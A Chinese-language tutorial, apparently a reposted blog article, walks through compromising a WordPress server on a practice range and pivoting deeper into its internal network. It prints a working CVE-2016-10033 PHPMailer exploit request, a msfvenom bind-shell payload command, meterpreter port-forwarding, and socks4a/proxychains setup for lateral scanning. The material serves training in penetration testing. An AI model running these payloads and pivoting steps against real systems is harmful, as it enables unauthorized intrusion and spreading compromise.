WordPress|黑客必学知识点--”什么是内网穿透“详解


WordPress|黑客必学知识点--”什么是内网穿透“详解文章插图
在平时护网比赛中 , 攻坚环境中 , 渗透测试中 , 做内网穿透使用的工具有很多如:EW、Cobalt Strike 为了方便小白入门 , 本次教程通过渗透过程中最常用的MSF攻击框架中socks4做内网穿透代理 , 实现内网横向渗透 。
用本公司的靶场 , 模拟一个攻坚小场景:
外网IP:112.115.*.* (一台存在wordpress漏洞的web服务器)
内网:10.0.0.0/24 (模拟开发人员 , 一台为weblogic漏洞机器 , 一台为thinkphp漏洞机器)
渗透思路:用MSF对wordpress漏洞进行反弹shell , 发现机器位于一个内网 , 建立socks4线路 , 横向扫描并对内网其他机器进行渗透并反弹shell
由于socks4做穿透超过3层就会失去流量速度 , 所以后期我会写一篇用EW或其他穿透工具做多网段多层穿透 。
攻击机:kali
目标机:攻坚靶场
首先开启kali , 利用Wordpress 4.6 任意命令执行漏洞 , 对主站服务器进行上传一句话或 , 直接反弹shell(为了一些教会小白一些提权细节 , 所以先写入一句话 , 然后在反弹msf shell)如果自己练习 , 可以直接msf生成shellcode扔到主站反弹shell 。
0x001 主站渗透
打开主站.*.*:8000/介绍一下这个漏洞
WordPress|黑客必学知识点--”什么是内网穿透“详解文章插图
WordPress <= 4.6命令执行漏洞(PHPMailer)(CVE-2016-10033)WordPress是一种使用PHP语言开发的博客平台 , 用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站 。 也可以把WordPress用作一个内容管理系统(CMS)来使用 。 WordPress使用PHPMailer组件向用户发送邮件 。 PHPMailer(版本<5.2.18)存在远程命令执行漏洞 , 攻击者只需轻松地构造出一个恶意邮箱地址 , 即可写入任意文件 , 从而造成远程命令执行的危害 。 POC
假如目标地址为:http : //127.0.0.1 : 8000/

  1. 把下面的HTTP报文复制到BurpSuite Repeater中 , 单击Go按钮 , 填充目标IP和扩展(例如 , IP填充127.0.0.1填充80)
【WordPress|黑客必学知识点--”什么是内网穿透“详解】POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0Accept: */*Content-Length: 56Content-Type: application/x-www-form-urlencodedwp-submit=Get+New+Password?%3E蚁剑连接shell:127.0.0.1:5000/shell.php
WordPress|黑客必学知识点--”什么是内网穿透“详解文章插图
现在要对这台内网机器提权msfshell , 由于是内网隔离环境 , 所以需要使用bind_shell
在msf生成一个bind_shell开端口木马启动后 , 在做本段端口转发过去 , msf在bind连接
新起一个终端:msf生成一个bindshell的木马(正向连接)
msfvenom -p linux/x86/meterpreter/bind_tcp lport=9999 -f elf -o bindshell放到通过webshell 放到/var/tmp/下加权限 , 启动
WordPress|黑客必学知识点--”什么是内网穿透“详解文章插图
现在内网10.0.0.3在9999端口开启直接连shell权限 , 现在要做一个新的转发把10.0.0.3:9999端口转发到本地 , 然后msf直连
WordPress|黑客必学知识点--”什么是内网穿透“详解文章插图
sessions sessions id编号meterpreter > portfwd add -L 127.0.0.1 -l 9999 -p 10.0.0.3 -r 9999
WordPress|黑客必学知识点--”什么是内网穿透“详解文章插图
现在内网10.0.0.3的bindshell 9999 端口 转发到 本地127.0.0.1:9999端口了
msf进行直连shell
use exploit/multi/handlerset payload linux/x86/meterpreter/bind_tcpshow optionsset LPORT 9999set RHOST 127.0.0.1run
WordPress|黑客必学知识点--”什么是内网穿透“详解文章插图
等待连接shell
WordPress|黑客必学知识点--”什么是内网穿透“详解文章插图
反弹shell后 , 只需要在10.0.0.3的shell上
use auxiliary/server/socks4aset 127.0.0.1set srvport 1081run添加一个新隧道在/etc/proxychains.conf 中添加 socks4 127.0.0.1 1081
在proxychains nmap 扫描就是直接连接到10.0.0.3上进行转发扫描 , 内网二级穿透扫描
127.0.0.1:1080<>主站跳板跳板机<>10.0.0.3跳板机<>新ip(192.168.0.1)实现了双跳板机内网穿透 , 同样方法 , 要是拿到192.168.0.1的第三层内网 , 只需要之前的添加个端口转发到本地 , 就能继续渗透 。 一般内网到第二层流量很少了 , 继续深层网段渗透就需要上 EW穿透神器等工具 。